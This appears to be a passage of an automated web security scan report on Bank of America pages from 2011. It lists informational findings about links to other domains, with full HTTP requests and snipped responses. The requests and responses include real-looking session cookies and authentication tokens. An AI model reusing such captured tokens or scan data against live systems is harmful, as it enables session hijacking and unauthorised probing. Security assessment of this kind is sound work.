Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:47 GMT
Content-type: text/html;charset=UTF-8
Set-Cookie: SMIDENTITY=gR5vcd2T/9Pc8ggsnVIGFH2qS8UPe2InnEOKagmWCynRXczda87F4qQCcxXuFUHUslSW1KHy/MNQvuu5a0LFHQ+Yb+bXZGJG4jTdlo9tzaaaKPx3Pagvvtj1nZrTvP4C46pkodCH4CDcB/3rGd3UgOWOSL4lcJfCqsncm1lYr6e/ggBvgbwAsg3ni4IblWDlcCFGxK6jvqACOjfn31o65GuqLQK0WtCQcW/tfxLNdLJ638dCE54AhZ4CJ6m42FeUmuFs2SXlyGiAzf+yLMGl+4hznDezzrBb/w3+N6PBIomj/sT2UCohDEmUTPyi/ZkV4wm9V+sBOUDySiXavKZak292O/W0gh9tk4PU4ZYiGNpxKH6gw9tMSXhsc9r7Zp5pMJQd8kUkt6VJnO6g2Ef2bEAraf+WGZI5kQorViWkIFPPu+x0DweCzY+yWJ5folKswk4G/dYJP9N2U6ybWc8jHuQ6r20V37uYeqO878kY4Zp47DVGcyRzQZ4guLBaha65; path=/; domain=.bankofamerica.com; secure
Content-language: en-US
Set-cookie: JSESSIONID=0000zX4AQQUcvRQK0iSsbAUjzzb:12qb4k7c1; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="EN">
   <head>
       <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css"
   rel="styles
...[SNIP]...
<NOSCRIPT>
   <IFRAME SRC="https://fls.doubleclick.net/activityi;src=1359940;type=consu416;cat=cccre876;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<td class="cardsFinderBorder" align="left" width="100">
                                               <a name="card_ImageLink_0" id="card_Image_id_0" class="cardPadding"
                                               href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVK"
                                               title="BankAmericard Cash Rewards Visa Signature Card"
                                               target="_self"
                                               >
<img style="border: 0px; margin:0px;"
                                               height="63"
                                               width="100"                                    
                                               src="https://images.bankofamerica.com/cpcms/ECOMM/group/8AZC/ECOMM0908AZC00406800152720EN000
...[SNIP]...
<td class="cardsFinderBorder">                
                                               
                                               
                                                                                                                                                                           <a name="cardsFinder_0" id="cardsFinder_id_0" class="productTitle" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVK"
                                                target="_self"
                                                title="BankAmericard Cash Rewards Visa Signature Card">

                                               BankAmericard Cash Rewards&trade; Visa Signature<sup style="vertical-align: text-top; font-size: 77%">
...[SNIP]...
<div class="clear">    
                                                       
                                                       
                                                                                                                                                                                                                                                                                                                                                                                                               <a name="applyNow_0" id="applyNow_id_0"
                                                           title="Apply Now"
                                                           href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVK"
                                                           target="_self"
                                                           class="button" onclick="this.blur();">
<span>
...[SNIP]...
<td class="cardsFinderBorder" align="left" width="100">
                                               <a name="card_ImageLink_1" id="card_Image_id_1" class="cardPadding"
                                               href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVM"
                                               title="BankAmericard Visa Card"
                                               target="_self"
                                               >
<img style="border: 0px; margin:0px;"
                                               height="63"
                                               width="100"                                    
                                               src="https://images.bankofamerica.com/cpcms/ECOMM/group/8AZE/ECOMM0908AZE00400800153260EN000
...[SNIP]...
<td class="cardsFinderBorder">                
                                               
                                               
                                                                                                                                                                           <a name="cardsFinder_1" id="cardsFinder_id_1" class="productTitle" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVM"
                                                target="_self"
                                                title="BankAmericard Visa Card">

                                               BankAmericard<sup style="vertical-align: text-top; font-size: 77%">
...[SNIP]...
<div class="clear">    
                                                       
                                                       
                                                                                                                                                                                                                                                                                                                                                                                                               <a name="applyNow_1" id="applyNow_id_1"
                                                           title="Apply Now"
                                                           href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVM"
                                                           target="_self"
                                                           class="button" onclick="this.blur();">
<span>
...[SNIP]...
<td class="cardsFinderBorder" align="left" width="100">
                                               <a name="card_ImageLink_2" id="card_Image_id_2" class="cardPadding"
                                               href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJ8B"
                                               title="Bank of America Accelerated Rewards American Express Card"
                                               target="_self"
                                               >
<img style="border: 0px; margin:0px;"
                                               height="63"
                                               width="100"                                    
                                               src="https://images.bankofamerica.com/cpcms/ECOMM/group/BAWQ/ECOMM090BAWQ00300100122250EN000
...[SNIP]...
<td class="cardsFinderBorder">                
                                               
                                               
                                                                                                                                                                           <a name="cardsFinder_2" id="cardsFinder_id_2" class="productTitle" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJ8B"
                                                target="_self"
                                                title="Bank of America Accelerated Rewards American Express Card">

                                               Bank of America<sup style="vertical-align: text-top; font-size: 77%">
...[SNIP]...
<div class="clear">    
                                                       
                                                       
                                                                                                                                                                                                                                                                                                                                                                                                               <a name="applyNow_2" id="applyNow_id_2"
                                                           title="Apply Now"
                                                           href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJ8B"
                                                           target="_self"
                                                           class="button" onclick="this.blur();">
<span>
...[SNIP]...

20.42. https://www.bankofamerica.com/deposits/cds-iras.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/cds-iras.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /deposits/cds-iras.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000WiNAyOMxZusl2j9h3aZNboI:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 53792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...
<NOSCRIPT>
   <IFRAME TITLE="iFrame used for layout purpose" SRC="https://fls.doubleclick.net/activityi;src=1359940;type=check839;cat=2010c509;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.43. https://www.bankofamerica.com/deposits/checking-accounts.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/checking-accounts.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /deposits/checking-accounts.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:00 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=00003ZvUSh-abHFPnIP9tbw3DTD:15emvovmt; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 57115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...
<NOSCRIPT>
   <IFRAME TITLE="iFrame used for layout purpose" SRC="https://fls.doubleclick.net/activityi;src=1359940;type=check839;cat=2010c435;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.44. https://www.bankofamerica.com/deposits/savings-accounts.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/savings-accounts.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /deposits/savings-accounts.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:45 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=00000-USIWkqPjgtQJCawAAI1hB:15emvorhf; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 60652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...
<NOSCRIPT>
   <IFRAME TITLE="iFrame used for layout purpose" SRC="https://fls.doubleclick.net/activityi;src=1359940;type=check839;cat=2010s508;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.45. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/add-it-up.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /deposits/special-programs/add-it-up.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:46 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000ti0PA0mGuPOKot4gZ7LWh8g:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 44436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...
<NOSCRIPT>
   <IFRAME TITLE="iFrame used for layout purpose" SRC="https://fls.doubleclick.net/activityi;src=1359940;type=check839;cat=2010r951;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.46. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /deposits/special-programs/keep-the-change.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /deposits/special-programs/keep-the-change.go?request_locale=en_US HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:49:47 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000lVAlgwSq7MWi-0gk3-04UQz:15emvp2j0; Path=/; Secure
Set-Cookie: BOFA_LOCALE_COOKIE=en-US; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: WAOR=1726259115.281.0000; path=/
Content-Length: 48014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>



...[SNIP]...
<NOSCRIPT>
   <IFRAME TITLE="iFrame used for layout purpose" SRC="https://fls.doubleclick.net/activityi;src=1359940;type=check839;cat=2010r790;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

20.47. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /homepage/WidgetAction.go?requestType=display&divId=36094CED-7EDF-11DF-889C-00144F3EA4A4%2C360925D9-7EDF-11DF-889C-00144F3EA4A4%2C3608FEC5-7EDF-11DF-889C-00144F3EA4A4%2C36099B13-7EDF-11DF-889C-00144F3EA4A4&isWidget=true&targetedAdParams=%7B%7BmoduleId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CD3AAA0A1-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C18A00502-E390-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CB48EEC16-0060-11DF-B411-00144F25F968%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C3619DDB0-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-media-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D&previousPageId=3601F9E2-7EDF-11DF-889C-00144F3EA4A4&callback=jsonp1303820701740&_=1303820711776 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:23:13 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4929

jsonp1303820701740({widgetdata:[{htmlsrc:'                                                     <!-- sm1.2one -->                                                        <div class="links-list-module">    <div class="column-co
...[SNIP]...
</div>                <a href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABILO&cm_sp=Cons-CC-_-CMS_Defaults_Q2_2011-_-CC14CH0001_BHP-Def-Hero_dep-101_mh2_cr_state_arn2h2d4_o.jpg" name="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Rewards&trade;. Get Started" target="_self" title="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Rewards&trade;. Get Started" >        <img src="/content/images/ContextualSiteGraphics/Marketing/Heroes/en_US/dep-101_mh2_cr_state_arn2h2d4_o.jpg" alt="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Reward
...[SNIP]...

20.48. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /homepage/overview.go?js=y HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:46:31 GMT
Server: IBM_HTTP_Server
X-FRAME-OPTIONS: DENY
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0000875pwxuDZJEvWhtX4tpFqcf:15pova7ls; Path=/
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 46802


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="https://www.merrilledge.com/m/pages/home.aspx" target="_self" name="signin_" >Online Investing</a>
...[SNIP]...
<li><a href="https://www.fs.ustrust.com/login/login.aspx?sgt=1" target="_self" name="signin__" >U.S. Trust Account Access</a>
...[SNIP]...
</a>


